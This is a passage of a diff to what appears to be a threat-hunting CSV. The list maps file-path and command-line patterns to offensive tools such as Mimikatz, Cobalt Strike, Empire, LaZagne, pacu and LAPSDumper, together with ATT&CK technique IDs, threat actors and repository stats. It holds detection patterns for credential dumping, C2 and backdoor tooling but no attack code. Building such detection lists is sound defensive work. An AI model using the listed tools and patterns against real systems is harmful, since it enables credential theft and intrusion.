shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/KittyStager/*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/kiwi.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/kiwi_passwords.yar*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*/klezVirus/CandyPotato*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/knqyf263/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/knqyf263/CVE-2022-0847","1","1","N/A","N/A","1","46","9","2022-03-08T13:54:08Z","2022-03-08T13:48:55Z" "*/knx-gateway-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -4143,11 +4167,11 @@ "*/koadic.git*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/Koh/*.cs*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*/KrakenMask.git*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" -"*/krb5/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/krb5/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/krb5-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/krbjack.git*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" "*/KrbRelay*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" -"*/krbrelayx*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*/krbrelayx*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "*/KRBUACBypass*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*/kronos.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/kubesploit.git*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" @@ -4159,86 +4183,89 @@ "*/Ladon/Ladon.*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*/Ladon/obj/x86*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*/LadonGo/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" -"*/lambda__backdoor_new_roles*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/lambda__backdoor_new_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/lambda__backdoor_new_users*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/lambda__backdoor_new_roles*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/lambda__backdoor_new_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/lambda__backdoor_new_users*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*/LambdaLooter.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" -"*/lanattacks/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/lanattacks/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/laps.py *--ldapserver*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*/laps.py *-u * -p *","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" -"*/laps_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/laps.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/laps_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/LAPSDumper.git*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" -"*/lastpass.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/lastpass.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*/Lateral/SMB.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*/lateral_movement/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/lateral_movement/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1092","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/laZagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*/LaZagne/Windows/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/ldap.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/lateral_movement/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 